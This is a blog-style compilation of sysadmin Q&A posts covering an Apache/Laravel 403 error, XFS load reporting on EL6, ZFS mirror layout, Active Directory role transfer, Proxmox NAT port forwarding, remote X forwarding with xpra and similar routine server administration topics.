Sunday, April 30, 2017

windows - Laravel "public"-folder error 403 (forbidden) - using Uniform Server (Apache)

I'm trying to create my first MVC project with the help of the framework Laravel, using the server platform Uniform Server. (Uniform Server uses Apache.)



The problem is, I cannot seem to get my routes to work. I suspect this is because upon trying to access http://localhost/project_name/public/, I receive the following error:



Forbidden

You don't have permission to access /project_name/public/ on this server.



i.e. error 403.



After some research it seems that this is a .htaccess problem, or a problem with my server configuration. This is because, if I have understood things right, access is simply not being granted to the folder.



Sounds easy enough to fix, but none of the fixes I find seem to work, or do not apply to the server platform I use. I must be missing something.



Moreover, while browsing my folders on localhost, the public folder is not displayed like the others are; I "reach" it only by typing the path into the URL field. The folder obviously exists, though, since I'm getting a 403 error rather than a 404, and of course it appears as it should in the file explorer.







This is my .htaccess file:





<IfModule mod_rewrite.c>
    <IfModule mod_negotiation.c>
        Options -MultiViews -Indexes
    </IfModule>

    RewriteEngine On

    # Handle Authorization Header
    RewriteCond %{HTTP:Authorization} .
    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]

    # Redirect Trailing Slashes If Not A Folder...
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_URI} (.+)/$
    RewriteRule ^ %1 [L,R=301]

    # Handle Front Controller...
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteRule ^ index.php [L]
</IfModule>






And for Uniform Server, this is the httpd.conf file:



#############################################

### Uniform Server - Apache Configuration ###
#############################################

# Environment variable ${PHP_SELECT} has a value of php52,
# php53, php54, php55 or php56. It is used in the following
# five define statements to select a PHP version to
# load as a module.
Define ${PHP_SELECT}



<IfDefine php53>
Include ${US_ROOTF}/core/apache2/conf/extra_us/php53.conf
</IfDefine>

<IfDefine php54>
Include ${US_ROOTF}/core/apache2/conf/extra_us/php54.conf
</IfDefine>

<IfDefine php55>
Include ${US_ROOTF}/core/apache2/conf/extra_us/php55.conf
</IfDefine>

<IfDefine php56>
Include ${US_ROOTF}/core/apache2/conf/extra_us/php56.conf
</IfDefine>

<IfDefine php70>
Include ${US_ROOTF}/core/apache2/conf/extra_us/php70.conf
</IfDefine>

<IfDefine php71>
Include ${US_ROOTF}/core/apache2/conf/extra_us/php71.conf
</IfDefine>





#
# This is the main Apache HTTP server configuration file. It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.4/> for detailed information.
# In particular, see
# <URL:http://httpd.apache.org/docs/2.4/mod/directives.html>
# for a discussion of each configuration directive.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "logs/access_log"
# with ServerRoot set to "/usr/local/apache2" will be interpreted by the
# server as "/usr/local/apache2/logs/access_log", whereas "/logs/access_log"

# will be interpreted as '/logs/access_log'.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path. If you point
# ServerRoot at a non-local disk, be sure to specify a local disk on the
# Mutex directive, if file-based mutexes are used. If you wish to share the

# same ServerRoot for multiple httpd daemons, you will need to change at
# least PidFile.
#
AcceptFilter http none
EnableSendfile Off
EnableMMAP off

ServerRoot "${US_ROOTF}/core/apache2"
PidFile ${US_ROOTF}/core/apache2/logs/httpd.pid



#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80

Listen ${AP_PORT}

#
# Dynamic Shared Object (DSO) Support
#
# To be able to use the functionality of a module which was built as a DSO you
# have to place corresponding `LoadModule' lines at this location so the
# directives contained in it are actually available _before_ they are used.
# Statically compiled modules (those listed by `httpd -l') do not need
# to be loaded here.

#
# Example:
# LoadModule foo_module modules/mod_foo.so
#
LoadModule access_compat_module modules/mod_access_compat.so
LoadModule actions_module modules/mod_actions.so
LoadModule alias_module modules/mod_alias.so
LoadModule allowmethods_module modules/mod_allowmethods.so
LoadModule asis_module modules/mod_asis.so
LoadModule auth_basic_module modules/mod_auth_basic.so

#LoadModule auth_digest_module modules/mod_auth_digest.so
#LoadModule auth_form_module modules/mod_auth_form.so
#LoadModule authn_anon_module modules/mod_authn_anon.so
LoadModule authn_core_module modules/mod_authn_core.so
#LoadModule authn_dbd_module modules/mod_authn_dbd.so
#LoadModule authn_dbm_module modules/mod_authn_dbm.so
LoadModule authn_file_module modules/mod_authn_file.so
#LoadModule authn_socache_module modules/mod_authn_socache.so
#LoadModule authnz_fcgi_module modules/mod_authnz_fcgi.so
#LoadModule authnz_ldap_module modules/mod_authnz_ldap.so

LoadModule authz_core_module modules/mod_authz_core.so
#LoadModule authz_dbd_module modules/mod_authz_dbd.so
#LoadModule authz_dbm_module modules/mod_authz_dbm.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_host_module modules/mod_authz_host.so
#LoadModule authz_owner_module modules/mod_authz_owner.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule autoindex_module modules/mod_autoindex.so
#LoadModule buffer_module modules/mod_buffer.so
#LoadModule cache_module modules/mod_cache.so

#LoadModule cache_disk_module modules/mod_cache_disk.so
#LoadModule cache_socache_module modules/mod_cache_socache.so
#LoadModule cern_meta_module modules/mod_cern_meta.so
LoadModule cgi_module modules/mod_cgi.so
#LoadModule charset_lite_module modules/mod_charset_lite.so
#LoadModule data_module modules/mod_data.so
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
#LoadModule dav_lock_module modules/mod_dav_lock.so
#LoadModule dbd_module modules/mod_dbd.so

LoadModule deflate_module modules/mod_deflate.so
LoadModule dir_module modules/mod_dir.so
#LoadModule dumpio_module modules/mod_dumpio.so
LoadModule env_module modules/mod_env.so
#LoadModule expires_module modules/mod_expires.so
#LoadModule ext_filter_module modules/mod_ext_filter.so
#LoadModule file_cache_module modules/mod_file_cache.so
LoadModule filter_module modules/mod_filter.so
#LoadModule http2_module modules/mod_http2.so
LoadModule headers_module modules/mod_headers.so

#LoadModule heartbeat_module modules/mod_heartbeat.so
#LoadModule heartmonitor_module modules/mod_heartmonitor.so
#LoadModule ident_module modules/mod_ident.so
#LoadModule imagemap_module modules/mod_imagemap.so
LoadModule include_module modules/mod_include.so
LoadModule info_module modules/mod_info.so
LoadModule isapi_module modules/mod_isapi.so
#LoadModule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so
#LoadModule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so
#LoadModule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so

#LoadModule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so
#LoadModule ldap_module modules/mod_ldap.so
#LoadModule logio_module modules/mod_logio.so
LoadModule log_config_module modules/mod_log_config.so
#LoadModule log_debug_module modules/mod_log_debug.so
#LoadModule log_forensic_module modules/mod_log_forensic.so
#LoadModule lua_module modules/mod_lua.so
#LoadModule macro_module modules/mod_macro.so
LoadModule mime_module modules/mod_mime.so
#LoadModule mime_magic_module modules/mod_mime_magic.so

LoadModule negotiation_module modules/mod_negotiation.so
#LoadModule proxy_module modules/mod_proxy.so
#LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
#LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
#LoadModule proxy_connect_module modules/mod_proxy_connect.so
#LoadModule proxy_express_module modules/mod_proxy_express.so
#LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so
#LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
#LoadModule proxy_html_module modules/mod_proxy_html.so
#LoadModule proxy_http_module modules/mod_proxy_http.so

#LoadModule proxy_scgi_module modules/mod_proxy_scgi.so
#LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so
#LoadModule ratelimit_module modules/mod_ratelimit.so
#LoadModule reflector_module modules/mod_reflector.so
#LoadModule remoteip_module modules/mod_remoteip.so
#LoadModule request_module modules/mod_request.so
#LoadModule reqtimeout_module modules/mod_reqtimeout.so
LoadModule rewrite_module modules/mod_rewrite.so
#LoadModule sed_module modules/mod_sed.so
#LoadModule session_module modules/mod_session.so

#LoadModule session_cookie_module modules/mod_session_cookie.so
#LoadModule session_crypto_module modules/mod_session_crypto.so
#LoadModule session_dbd_module modules/mod_session_dbd.so
LoadModule setenvif_module modules/mod_setenvif.so
#LoadModule slotmem_plain_module modules/mod_slotmem_plain.so
#LoadModule slotmem_shm_module modules/mod_slotmem_shm.so
#LoadModule socache_dbm_module modules/mod_socache_dbm.so
#LoadModule socache_memcache_module modules/mod_socache_memcache.so
LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
#LoadModule speling_module modules/mod_speling.so

#LoadModule ssl_module modules/mod_ssl.so
LoadModule status_module modules/mod_status.so
#LoadModule substitute_module modules/mod_substitute.so
#LoadModule unique_id_module modules/mod_unique_id.so
LoadModule userdir_module modules/mod_userdir.so
#LoadModule usertrack_module modules/mod_usertrack.so
LoadModule version_module modules/mod_version.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so
#LoadModule watchdog_module modules/mod_watchdog.so
#LoadModule xml2enc_module modules/mod_xml2enc.so

#LoadModule plua_module modules/mod_plua.so


#Added new module

ProtocolsHonorOrder On
Protocols h2 http/1.1






User daemon
Group daemon



# 'Main' server configuration
#
# The directives in this section set up the values used by the 'main'

# server, which responds to any requests that aren't handled by a
# <VirtualHost> definition. These values also provide defaults for
# any <VirtualHost> containers you may define later in the file.
#
# All of these directives may appear inside <VirtualHost> containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#

#

# ServerAdmin: Your address, where problems with the server should be
# e-mailed. This address appears on some server-generated pages, such
# as error documents. e.g. admin@your-domain.com
#
ServerAdmin admin@${US_SERVERNAME}

#
# ServerName gives the name and port that the server uses to identify itself.
# This can often be determined automatically, but we recommend you specify
# it explicitly to prevent problems during startup.

#
# If your host doesn't have a registered DNS name, enter its IP address here.
#
#ServerName www.example.com:80
ServerName ${US_SERVERNAME}

#
# Deny access to the entirety of your server's filesystem. You must
# explicitly permit access to web content directories in other
# <Directory> blocks below.
#

<Directory />
    #mine
    Options FollowSymLinks

    AllowOverride all
    #Require all denied
</Directory>


#
# Note that from this point forward you must specifically allow
# particular features to be enabled - so if something's not working as
# you might expect, make sure that you have specifically enabled it
# below.
#

#
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but

# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "${US_ROOTF_WWW}"
<Directory "${US_ROOTF_WWW}">

    #
    # Possible values for the Options directive are "None", "All",
    # or any combination of:
    #   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
    #
    # Note that "MultiViews" must be named *explicitly* --- "Options All"
    # doesn't give it to you.
    #
    # The Options directive is both complicated and important. Please see
    # http://httpd.apache.org/docs/2.4/mod/core.html#options
    # for more information.
    #
    #Options Indexes FollowSymLinks
    Options Indexes Includes

    #
    # AllowOverride controls what directives may be placed in .htaccess files.
    # It can be "All", "None", or any combination of the keywords:
    #   Options FileInfo AuthConfig Limit
    #
    AllowOverride All

    #
    # Controls who can get stuff from this server.
    #
    Require all granted

</Directory>



#
# DirectoryIndex: sets the file that Apache will serve if a directory
# is requested.
#

<IfModule dir_module>
    DirectoryIndex index.html index.shtml index.html.var index.htm index.php3 index.php index.lua index.pl index.cgi
</IfModule>



#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#

<Files ".ht*">
    Require all denied
</Files>


#
# ErrorLog: The location of the error log file.

# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog "logs/error.log"

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.
#
LogLevel warn


#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
#
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined

LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent


# You need to enable mod_logio.c to use %I and %O
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio




#
# If you prefer a logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
#
CustomLog "logs/access.log" combined




Alias /us_docs "${US_ROOTF}/docs/"


#opt1>phpMyAdmin opt2>Adminer opt3>phpMyBaskupPro
Alias /us_opt1 "${US_ROOTF}/home/us_opt1/"
Alias /us_opt2 "${US_ROOTF}/home/us_opt2/"
Alias /us_opt3 "${US_ROOTF}/home/us_opt3/"
Alias /us_pac "${US_ROOTF}/home/us_pac/"

Alias /us_mongoadmin "${US_ROOTF}/home/us_mongoadmin/"
Alias /us_pear "${US_ROOTF}/home/us_pear/"
Alias /us_splash "${US_ROOTF}/home/us_splash/"

Alias /us_extra "${US_ROOTF}/home/us_extra/"
Alias /webalizer "${US_ROOTF}/webalizer/"
Alias /us_test_access "${US_ROOTF}/home/us_access/www/"

#
# ScriptAlias: This controls which directories contain server scripts.
# ScriptAliases are essentially the same as Aliases, except that
# documents in the target directory are treated as applications and
# run by the server when requested rather than as documents sent to the
# client. The same rules about trailing "/" apply to ScriptAlias

# directives as to Alias.
#
ScriptAlias /cgi-bin/ "${US_ROOTF}/cgi-bin/"




#
# ScriptSock: On threaded servers, designate the path to the UNIX
# socket used to communicate with the CGI daemon of mod_cgid.

#
#Scriptsock logs/cgisock



<Directory "${US_ROOTF}/docs/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

#== Default phpMyAdmin
<Directory "${US_ROOTF}/home/us_opt1/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

#== Default Adminer
<Directory "${US_ROOTF}/home/us_opt2/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

#== Default phpMyBackupPro
<Directory "${US_ROOTF}/home/us_opt3/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

#== PAC - Location to serve proxy.pac
<Directory "${US_ROOTF}/home/us_pac/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>





<Directory "${US_ROOTF}/home/us_mongoadmin/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

<Directory "${US_ROOTF}/home/us_pear/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

<Directory "${US_ROOTF}/home/us_splash/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

<Directory "${US_ROOTF}/home/us_extra/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

<Directory "${US_ROOTF}/webalizer/">
    Options Indexes Includes
    AllowOverride All
    Require all granted
</Directory>

<Directory "${US_ROOTF}/home/us_access/www/">
    Require all granted
</Directory>


#
# "c:/Apache24/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#


<Directory "${US_ROOTF}/cgi-bin/">
    AllowOverride All
    Options ExecCGI
    Require all granted
</Directory>

<Directory "${US_ROOTF_WWW}/cgi-bin/">
    AllowOverride All
    Options ExecCGI
    Require all granted
</Directory>





#
# TypesConfig points to the file containing the list of mappings from
# filename extension to MIME-type.
#
TypesConfig conf/mime.types

#
# AddType allows you to add to or override the MIME configuration

# file specified in TypesConfig for specific file types.
#
#AddType application/x-gzip .tgz
#
# AddEncoding allows you to have certain browsers uncompress
# information on the fly. Note: Not all browsers support this.
#
#AddEncoding x-compress .Z
#AddEncoding x-gzip .gz .tgz
#

# If the AddEncoding directives above are commented-out, then you
# probably should define those extensions to indicate media types:
#
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz


AddType text/html .shtml
AddOutputFilter INCLUDES .shtml


# PAC files e.g proxy.pac
AddType application/x-ns-proxy-autoconfig .pac

#used for configuring auto detect setting using DNS
#AddType application/x-ns-proxy-autoconfig .dat






<IfModule mime_magic_module>
    MIMEMagicFile conf/magic
</IfModule>


# Supplemental configuration
#
# The configuration files in the conf/extra/ directory can be
# included to add extra features or to modify the default configuration of
# the server, or you may simply copy their contents here and change as
# necessary.


# Server-pool management (MPM specific)
Include conf/extra/httpd-mpm.conf

# Multi-language error messages
#Include conf/extra/httpd-multilang-errordoc.conf

# Fancy directory listings
Include conf/extra/httpd-autoindex.conf

# Language settings

#Include conf/extra/httpd-languages.conf

# User home directories
#Include conf/extra/httpd-userdir.conf

# Real-time info on requests and configuration
Include conf/extra/httpd-info.conf

##====== VIRTUAL HOST ===========
#To enable uncomment next line

#Include conf/extra/httpd-vhosts.conf

# Local access to the Apache HTTP Server Manual
#Include conf/extra/httpd-manual.conf

# Distributed authoring and versioning (WebDAV)
#Include conf/extra/httpd-dav.conf

# Various default settings
Include conf/extra/httpd-default.conf



# Secure (SSL/TLS) connections
Include conf/extra/httpd-ssl.conf


# Deflate Module configuration

Include conf/extra/httpd-deflate.conf



# FastCGI Module configuration

Include conf/extra/httpd-fcgid.conf


# Proxy Html Module configuration

Include conf/extra/httpd-proxy-html.conf



# Uptime Module configuration

Include conf/extra/httpd-uptime.conf


# Uniform Server Lua config

Include conf/extra/us_lua.conf



# Uniform Server pLua config

Include conf/extra/us_plua.conf


# Secure (SSL/TLS) connections
#Include conf/extra/httpd-ssl.conf
#
# Note: The following must be present to support

# starting without SSL on platforms with no /dev/random equivalent
# but a statically compiled-in mod_ssl.
#

<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>



ThreadStackSize 8888888







EDIT 1:



I checked my apache error log and found this:





[Fri Dec 01 12:24:50.572746 2017] [rewrite:error] [pid 20384:tid 1844]
[client ::1:60851] AH00670: Options FollowSymLinks and
SymLinksIfOwnerMatch are both off, so the RewriteRule directive is
also forbidden due to its similar ability to circumvent directory
restrictions :
C:/Users/Admin/Uniform/UniServerZ/www/project_name/public/




Aha! So perhaps it is indeed my server configuration?
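That AH00670 message narrows it down: mod_rewrite refuses to run unless FollowSymLinks (or SymLinksIfOwnerMatch) is enabled for the directory, and the DocumentRoot block above only grants Options Indexes Includes. A minimal candidate fix, assuming .htaccess overrides are honored (the AllowOverride All above suggests they are), is to merge the option back in on the Options line of public/.htaccess:

Options -MultiViews -Indexes +FollowSymLinks

Alternatively, add FollowSymLinks to the Options line of the DocumentRoot's Directory block in httpd.conf and restart Apache.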

Is there a locally hosted service (similar to Pingdom) for monitoring uptime/response time?











I'm looking for something to monitor intranet apps and internal web services, and provide logs of historical response times, uptime, alerts if the system becomes unavailable...



In short, I'm looking for something that's almost identical to Pingdom, but which can be run on an internal monitoring server so we don't have to expose our intranet pages and API endpoints to the outside world.




Open source, commercial, free - doesn't really matter. Just curious to know what's out there!


Answer



Yep, there are tons; some examples:



http://community.zenoss.org/
http://www.zabbix.com/
http://www.nagios.org


Friday, April 28, 2017

linux - The XFS filesystem is broken in RHEL/CentOS 6.x - What can I do about it?



Recent versions of RHEL/CentOS (EL6) brought some interesting changes to the XFS filesystem I've depended on heavily for over a decade. I spent part of last summer chasing down an XFS sparse file situation resulting from a poorly-documented kernel backport. Others have had unfortunate performance issues or inconsistent behavior since moving to EL6.




XFS was my default filesystem for data and growth-partitions, as it offered stability, scalability and a good performance boost over the default ext3 filesystems.



There's an issue with XFS on EL6 systems that surfaced in November 2012. I noticed that my servers were showing abnormally high system loads, even when idle. In one case, an unloaded system would show a constant load average of 3+. In others, there was a 1+ bump in load. The number of mounted XFS filesystems seemed to influence the severity of the load increase.



System has two active XFS filesystems. Load is +2 following upgrade to the affected kernel.



Digging deeper, I found a few threads on the XFS mailing list that pointed to an increased frequency of the xfsaild process sitting in the STAT D state. The corresponding CentOS Bug Tracker and Red Hat Bugzilla entries outline the specifics of the issue and conclude that this is not a performance problem; only an error in the reporting of system load in kernels newer than 2.6.32-279.14.1.el6.



WTF?!?




In a one-off situation, I understand that the load reporting may not be a big deal. Try managing that with your NMS and hundreds or thousands of servers! This was identified in November 2012 at kernel 2.6.32-279.14.1.el6 under EL6.3. Kernels 2.6.32-279.19.1.el6 and 2.6.32-279.22.1.el6 were released in subsequent months (December 2012 and February 2013) with no change to this behavior. There's even been a new minor release of the operating system since this issue was identified. EL6.4 was released and is now on kernel 2.6.32-358.2.1.el6, which exhibits the same behavior.



I've had a new system build queue and have had to work around the issue, either locking kernel versions at the pre-November 2012 release for EL6.3 or just not using XFS, opting for ext4 or ZFS, at a severe performance penalty for the specific custom application running atop. The application in question relies heavily on some of the XFS filesystem attributes to account for deficiencies in the application design.



Going behind Red Hat's paywalled knowledgebase site, an entry appears stating:




High load average is observed after installing kernel
2.6.32-279.14.1.el6. The high load average is caused by xfsaild going into D state for each XFS formatted device.




There is currently no resolution for this issue. It is currently being tracked via Bugzilla #883905.

Workaround: Downgrade the installed kernel package to a version lower than 2.6.32-279.14.1.




(except that downgrading kernels is not an option on RHEL 6.4...)



So we're 4+ months into this problem with no real fix planned for the EL6.3 or EL6.4 OS releases. There's a proposed fix for EL6.5 and a kernel source patch available... But my question is:




At what point does it make sense to depart from the OS-provided kernels and packages when the upstream maintainer has broken an important feature?



Red Hat introduced this bug. They should incorporate a fix into an errata kernel. One of the advantages of using enterprise operating systems is that they provide a consistent and predictable platform target. This bug disrupted systems already in production during a patch cycle and reduced confidence in deploying new systems. While I could apply one of the proposed patches to the source code, how scalable is that? It would require some vigilance to keep updated as the OS changes.



What's the right move here?




  • We know this could possibly be fixed, but not when.

  • Supporting your own kernel in a Red Hat ecosystem has its own set of caveats.

  • What's the impact on support eligibility?


  • Should I just overlay a working EL6.3 kernel on top of newly-built EL6.4 servers to gain the proper XFS functionality?

  • Should I just wait until this is officially fixed?

  • What does this say about the lack of control we have over enterprise Linux release cycles?

  • Was relying on an XFS filesystem for so long a planning/design mistake?



Edit:



This patch was incorporated into the most recent CentOSPlus kernel release (kernel-2.6.32-358.2.1.el6.centos.plus). I'm testing this on my CentOS systems, but this doesn't help much for the Red Hat-based servers.


Answer





At what point does it make sense to depart from the OS-provided kernels and packages when the upstream maintainer has broken an important feature?




"At the point where the vendor's kernel or packages are so horribly broken that they impact your business" is my general answer (coincidentally this is also about the point where I say it makes sense to start looking at ways to depart from the vendor relationship).



Basically as you and others have said, RedHat seems to not want to patch this in their distributed kernel (for whatever reason). That pretty much leaves you in the situation of having to roll your own kernel (keeping it up to date on patches yourself, maintaining your own package and installing it on your systems with Puppet or similar, or running a package server that Yum or whatever they use today can reference), or taking your marbles and going home.







Yes I know taking your marbles and going home is often an expensive proposition -- switching OS vendors is a huge pain, especially in the Linux world where the flavors are radically different from an administrative standpoint.
Other options like going totally CentOS are also unappealing (because you lose support, and you're still getting essentially RedHat's code built by someone else so you'd still have this bug).



Unfortunately, unless enough people (i.e. "huge companies") take their marbles and go home, the vendor won't care so much about screwing people over by shipping bad code and not fixing it.


Thursday, April 27, 2017

ZFS sample config opinions

I recently asked a question about the best way to apply 20 2TB drives in a ZFS pool. I have come up with the following setup (thanks to many helpful suggestions) and would love opinions and suggestions about what I may have missed.



I have two SATA controllers (controller1 & controller2) that have the following disks attached:




  • controller1



    • disk1

    • disk3

    • disk5

    • disk7

    • spare1


  • controller2



    • disk2

    • disk4

    • disk6

    • disk8

    • spare2




My thought was to create the pool using mirror pairs of disks, one disk each from each controller; ie:





  • mirror1: disk1 & disk2

  • mirror2: disk3 & disk4, etc



The two spare drives would give me some redundancy and also having the mirrors made up of disks from each controller should give me some redundancy as well.



Have I missed anything? I feel like I can grow the pool with little fuss by adding mirrored pairs, and add more redundancy by adding spare pairs (a zpool sketch of this layout follows below).



I feel like this would give me a good balance of speed and redundancy.




Thoughts welcome and appreciated.
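For reference, the layout above maps to a single zpool create; a sketch using the placeholder device names from the list (a real system would use stable /dev/disk/by-id paths):

zpool create tank \
    mirror disk1 disk2 \
    mirror disk3 disk4 \
    mirror disk5 disk6 \
    mirror disk7 disk8 \
    spare spare1 spare2

Later growth is then a matter of zpool add tank mirror disk9 disk10, which matches the "grow the pool with little fuss" goal.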

Wednesday, April 26, 2017

ssd - HP Proliant DL360 G9 with Samsung 983 DCT

I have a HP Proliant DL360 G9 (with P440ar storage controller). I would like to know whether it is possible to connect NVMe U.2 SSD? The SSD I was thinking about is Samsung 983 DCT.



I'm not sure how to determine whether the controller supports U.2. It only specifies that it supports SAS/SATA, and that it has a PCI Express Gen3 x8 link.




Another thing - does the controller determine the backplane connectors? Or are those two separate items?

domain - Active Directory Subdomain vs new "Tree in Forest" ... is there a difference?

We have the forest named "company.com" and are debating between "thing.company.com" versus "thing.local". My understanding is that the latter is called a "Tree in a Forest"



What are the deciding criteria that will help me choose which is better? Is there any security, management, or GPO setting that favors one over the other?

Tuesday, April 25, 2017

windows server 2003 - Cannot transfer Schema role to another Domain Controller



I've inherited a small data center that is set up with two domain controllers. The first domain controller, which is home to the five operations master roles (win2003server), is an older server, and I want to move the operations masters to the other domain controller (win2003r2 server).



When I go to the Active Directory Schema MMC snap-in and open Operations Master, the Change button is greyed out. Do I need to move the other roles prior to moving the Schema Master role, or is it greyed out for another reason?


Answer




You are likely not a member of the Schema Admins group. You need that group membership to transfer the schema master role.
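If the snap-in still refuses after the group change (log off and back on so the new membership is in your access token), the same transfer can be done from the command line; a sketch with ntdsutil, where TARGETDC is a hypothetical name for the win2003r2 DC:

ntdsutil
roles
connections
connect to server TARGETDC
quit
transfer schema master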


Monday, April 24, 2017

Can you update HP firmware via iLO virtual disk?

Simple question: can you do this? Right now we have a server in a remote data center with no ability to get anyone on site. We recently had an HP tech there to swap out a failed disk; however, the disk is now refusing to rebuild. Apparently there may be some issues with the firmware rev, but there's no way we can get a DVD out there in a timeframe we're comfortable with. I do have the DVD firmware-update ISO, though, and I'm staring at the remote console just wondering.



Obviously I won't be updating iLO, but the other firmware.

How to upgrade to OpenSSL 1.0.2 within Ubuntu 14.04 LTS

I need to upgrade OpenSSL to 1.0.2 to get a certain feature. This worked following this tutorial: http://www.miguelvallejo.com/updating-to-openssl-1-0-2g-on-ubuntu-server-12-04-14-04-lts-to-stop-cve-2016-0800-drown-attack/. However, HAProxy, for example, is still built against the old OpenSSL version and thus does not support the SSL feature I need.



How do I upgrade without compiling? I tried apt-get update and upgrade, and also dist-upgrade. None of that brought me to version 1.0.2.

Sunday, April 23, 2017

iptables - Port forwarding from a single public ip for VM Client ( proxmox under debian )




I have a port forwarding problem with Proxmox under Debian.



I have two interfaces (eth0 and vmbr2); how can I access my client VM (a web server) from an external network by forwarding from a single public IP?



I think I have some bad configuration in /etc/network/interfaces.



Here's my interfaces :



auto eth0

iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.224
gateway xxx.xxx.xxx.xxx
up route add -net xxx.xxx.xxx.xxx netmask 255.255.255.224 gw xxx.xxx.xxx.xxx eth0


And for the vmbr2 interface:



auto vmbr2

#private sub network
iface vmbr2 inet static
address 192.168.100.254
netmask 255.255.255.0
bridge_ports none
bridge_stp off
bridge_fd 0

post-up echo 1 > /proc/sys/net/ipv4/ip_forward
post-up iptables -t nat -A POSTROUTING -s '192.168.100.0/24' -o eth0 -j ACCEPT

post-down iptables -t nat -D POSTROUTING -s '192.168.100.0/24' -o eth0 -j ACCEPT

post-up iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 2222 -j DNAT --to 192.168.100.6:22
post-down iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 2222 -j DNAT --to 192.168.100.6:22


Thank you very much for your help


Answer



Just replace "ACCEPT" to "MASQUERADE" in the POSTROUTING rule.


x11 - ssh -X How to return a remote forwarded X application to localhost



I'm using Mac OS X 10.6.4
I'm opening an ssh session to a remote system running Ubuntu 10.04 Desktop



I open a remote VPN connection to a remote network
Then:
ssh -X user@host
screen -S openvas
sudo OpenVAS-Client #OpenVAS-Client GUI then forwards to my remote desktop



I want to configure and launch a scan in the OpenVAS GUI remotely over the ssh -X session. After I've launched the scan I want to send the OpenVAS-Client GUI back to its localhost, detach from my screen session, close the ssh session, and close the VPN connection. Hours later I want to be able to open the VPN connection again, ssh -X back into the remote computer, re-attach to the screen session, and bring the OpenVAS-Client back to my remote computer to look at the progress of the scan.



Is this possible?
Can someone point me in the direction of what commands and options to choose?




Thanks in advance.



Note: I don't really want to use VNC. I had installed NX and it worked in the lab but I can't log in over the VPN so that's a different problem.


Answer



Have a look at Xpra, it allows you to "detach" from and "reattach" to running X applications.
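A sketch of that workflow, assuming xpra is installed on both machines (the display number :100 is arbitrary):

# on the remote host: start a persistent xpra display with the app in it
xpra start :100 --start-child="OpenVAS-Client"
# from the Mac: attach over ssh, launch the scan in the GUI, then detach
xpra attach ssh:user@host:100
# hours later: run the same attach command again to pick the GUI back up

Unlike plain ssh -X, the application keeps running against xpra's virtual display while you are detached, so no screen juggling is needed for the GUI itself.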


Saturday, April 22, 2017

debugging - Server does not load WordPress - No HTML nor PHP Errors



I just switched my Dreamhost WordPress site on my VPS from PHP 5.2 FastCGI to 5.3 CGI. Somehow WordPress now refuses to load and shows a white screen of death on all WordPress pages. PHP info and static HTML load just fine.



I discussed some possible solutions with support staff at Dreamhost, but no results as of yet. I have done the following:




  • I have switched to the Twenty Eleven default theme

  • I have disabled all plugins using phpMyAdmin.

  • I also created a phprc like this to log PHP errors, but none are logged there at the moment.




PHP is loaded, as I verified using phpinfo(), and it also showed that my phprc is loaded as an additional ini.



When I load the home page I get an HTTP 200 and a white screen of death, but no errors whatsoever. How can I debug this further to fix this issue?
